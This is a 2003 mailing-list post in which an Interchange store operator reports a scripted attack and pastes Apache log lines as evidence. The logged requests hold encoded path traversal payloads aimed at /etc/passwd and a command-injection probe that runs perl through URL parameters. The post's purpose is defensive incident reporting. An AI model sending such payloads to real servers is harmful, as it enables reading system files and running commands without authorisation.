[ic] Hack attempt on IC 4.8.6

Ryan Grace ryan at ryangrace.com
Fri Nov 14 22:35:13 EST 2003 

>From what I can tell this person was unsuccessful.  My IC and Apache logs show multiple attempts to grab my passwd file by inserting many ../../../../../'s in the URLs and attempts to execute arbitrary perl code by manipulating URL parameters.  Here are a few lines:

66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=%2e%2e%2f%
2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4
.0; Windows 95)"
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%
7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00 HTTP/1.0" 403
 82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id= HTTP/1.0"
 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id= HTTP/1.0"
 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_sessi
on_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2
e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice HTT
P/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_sessi
on_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%
2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 302 39
"-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_sessi
on_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2
e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice HTTP/1.0"
403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"

Sorry for the weird wrapping.  The log goes on and on like this.

Has anyone else seen this kind of attempt?  It looks like a script judging by the rapidity of the accesses.

Ryan

More information about the interchange-users mailing list